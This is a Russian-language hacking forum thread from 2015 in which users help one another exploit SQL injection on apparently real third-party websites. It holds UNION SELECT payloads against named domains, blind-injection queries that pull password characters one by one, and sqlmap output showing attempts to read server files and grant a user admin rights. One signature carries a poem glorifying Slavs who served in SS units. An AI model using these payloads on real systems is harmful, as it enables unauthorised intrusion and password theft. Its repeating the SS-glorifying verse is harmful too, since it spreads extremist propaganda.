 |
|
12.05.2015, 01:19
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от sunnyfruit
↑
Создал на Денвере таблицу users где есть id и username
Пишет ошибку:
Сам запрос:
Где почитать можно подробнее?
Mysql символ " не совсем хорошо понимает!
Не " , а ' .
|
|
|
12.05.2015, 08:19
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Код:
http://www.freelin-wade.com/search.php?cmd=search&words=kkk%27
помогите раскрутить |
|
|
|
12.05.2015, 09:10
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Br@!ns
↑
Код:
http://www.freelin-wade.com/search.php?cmd=search&words=kkk%27
помогите раскрутить
боюсь, не выйдет. и запроса все вырезается и экранируется. можно бы было попробовать, если бы можно было внедриться в 2 поля
|
|
|
|
12.05.2015, 13:35
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
|
|
|
|
12.05.2015, 13:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Unknowhacker
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,2,3,4+--+
[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//psf.com.ua/modules.php?name=news&option=3&news_id=-113+%0AUnion%0ASelect+1,table_name,3,4+from+information_schema.tables+--+[/COLOR][/COLOR]
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
12.05.2015, 21:46
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Почему при ручной эксплуатации blind sql, запросы:
Код:
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
Будут одинаково TRUE? PS 0x64='d' 0x44='D'
Как в таком случае определить в каком регистре буква в пароле? |
|
|
|
12.05.2015, 21:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Br@!ns
↑
Почему при ручной эксплуатации blind sql, запросы:
Код:
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x64+--+
or+substring((select+password+from+user+where+id=1+limit+0,1),9,1)=0x44+--+
Будут одинаково TRUE? PS 0x64='d' 0x44='D'
Как в таком случае определить в каком регистре буква в пароле?
используйте ascii()
|
|
|
|
12.05.2015, 23:32
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Можно ли как нибудь проверить полученный результат с помощью этойфункции, или же он работает только с одним символом? пример:
нужно проверить итоговую сумму в выражении, чтоб не ошибиться с регистром
Код:
ascii(substring((select+password+from+users+where+id=1+limit+0,1),8,2))=0x4453+--+
|
|
|
|
12.05.2015, 23:45
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от Br@!ns
↑
Можно ли как нибудь проверить полученный результат с помощью этойфункции, или же он работает только с одним символом? пример:
нужно проверить итоговую сумму в выражении, чтоб не ошибиться с регистром
Код:
ascii(substring((select+password+from+users+where+id=1+limit+0,1),8,2))=0x4453+--+
ascii() переводит только 1 символ, смотрите в документации
|
|
|
|
13.05.2015, 03:50
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Имеется сайт с sql-injections, но возникли впоросы с sqlmap
Код:
[Linux Debian] [Apache 2.4.10] [MySQL 5.0] ['10.0.16-MariaDB-1']
Privilege: USAGE
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: http://site.com/news.html?id=(SELECT 1582 FROM(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1582=1582,1))),0x71706b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&cat=main
Не работает --file-read="/home/www/wwuser/user/www/index.php" (или тот же .htaccess, js не важно)
Выдает пустой файл:
.SpoilerTarget" type="button">Spoiler: Результат
Код:
[WARNING] reflective value(s) found and filtering out
[INFO] retrieved:
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
files saved to [1]:[*] C:\sqlmap\output\site.com\files\_home_www_wwuser_user_www_index.php (size differs from remote file)
И тот же вопрос по --sql-query="UPDATE users SET admin=1 WHERE login=test" (как только не пробовал)
.SpoilerTarget" type="button">Spoiler: Результат
Код:
[WARNING] execution of custom SQL queries is only available when stacked queries are supported
UPDATE UPDATE users SET admin=1 WHERE login=test: None
[INFO] fetched data logged to text files under 'C:\sqlmap\output\site.com\'
Это из-за нехватки прав? Или что то другое мешает? |
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
